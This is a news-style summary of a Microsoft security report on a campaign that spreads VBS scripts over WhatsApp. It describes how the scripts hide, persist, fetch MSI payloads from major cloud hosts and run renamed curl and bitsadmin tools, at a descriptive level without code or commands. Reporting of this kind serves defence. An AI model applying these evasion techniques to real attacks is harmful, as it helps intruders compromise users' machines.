Microsoft has issued a warning regarding a recent cyberattack campaign that uses WhatsApp messages to spread harmful Visual Basic Script files. Starting in February 2026, this multi-stage attack establishes a permanent presence on infected devices to grant hackers remote access.
Microsoft researchers have identified a sophisticated campaign where attackers distribute malicious scripts through WhatsApp to compromise user systems. While the specific messages used to trick victims remain unidentified, the scripts trigger a complex infection process designed to fly under the radar. Once a user executes the file, the system begins a series of automated steps to ensure the hackers can maintain access even after the computer restarts.
The core of this strategy involves a mix of social engineering and techniques that utilize existing system tools to avoid detection. By using legitimate Windows utilities that have been renamed, the malware mimics standard system processes. This approach makes it incredibly difficult for traditional security software to flag the activity as suspicious since the commands being run appear to be part of the operating system’s normal functions.
To further hide their tracks, the threat actors host their malicious payloads on reputable cloud platforms including Amazon Web Services, Tencent Cloud, and Backblaze B2. When the initial script runs, it reaches out to these trusted services to download additional components. This is a particularly effective tactic because many corporate networks allow traffic to these major cloud providers by default, allowing the malware to bypass strict firewall rules.
The technical execution begins with the creation of hidden folders within the program data directory of the C drive. The attackers then deploy renamed versions of standard tools like curl and bitsadmin, disguising them with filenames like netapi.dll and sc.exe. These tools are then used to pull down malicious Microsoft Installer packages which finalize the takeover of the host machine.
This combination of trusted communication channels, legitimate cloud hosting, and native Windows tools represents a significant threat to digital security. By blending in with everyday network traffic and system operations, the attackers significantly increase their chances of remaining undetected for long periods. Microsoft continues to monitor the situation as the campaign evolves and encourages users to remain cautious of unexpected files received through messaging apps.
Source: https://www.microsoft.com/en-us/security/blog/2026/03/31/whatsapp-malware-campaign-delivers-vbs-payloads-msi-backdoors/